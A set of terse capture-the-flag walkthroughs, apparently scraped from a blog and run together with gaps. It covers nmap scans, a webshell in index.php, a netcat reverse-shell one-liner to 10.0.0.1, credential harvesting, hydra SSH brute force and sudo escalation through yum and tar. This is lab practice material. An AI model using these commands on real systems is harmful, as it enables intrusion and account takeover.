Let's Start !!!First start with the nmap scan. "nmap -sV -A -oN nmap/initial $IP" Scan all ports with rustscan because it's Fast.
Knock knock was a hint of port Knocking. If you want to know about it more you can see this.
Finished !!!! :)
0 Comments
Let's Start !!!First Start with the nmap scan. "nmap -sV -A -oN nmap/initial $IP -vv"
Log in to the website wtih the password & add a webshell in the index.php file. Now use the webshell to get reverse shell. "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f" But beforing using it encode it using url encoder.
If You open that file you will find some base64 codes. After decoding it you will see some interesting creds. You will find the password of root's mysql server, but it's also the ssh password of jjameson. 'sudo -l' You will see that you can run 'yum' as sudo.
Finished !!!!! :)Let's Start !!!First Start with the nmap scan, "nmap -sV -A -oN nmap/initial $IP -vv" Found port 21 open, and ftp anonymous login is allowed. Found two files in the ftp folder.
Now Bruteforce ssh service with hydra, you will get the password :) Note: "bounty" in this photo is the IP of the target
"sudo -l" We can see that we can run tar as root . Now ,
Finished!!!!! :) |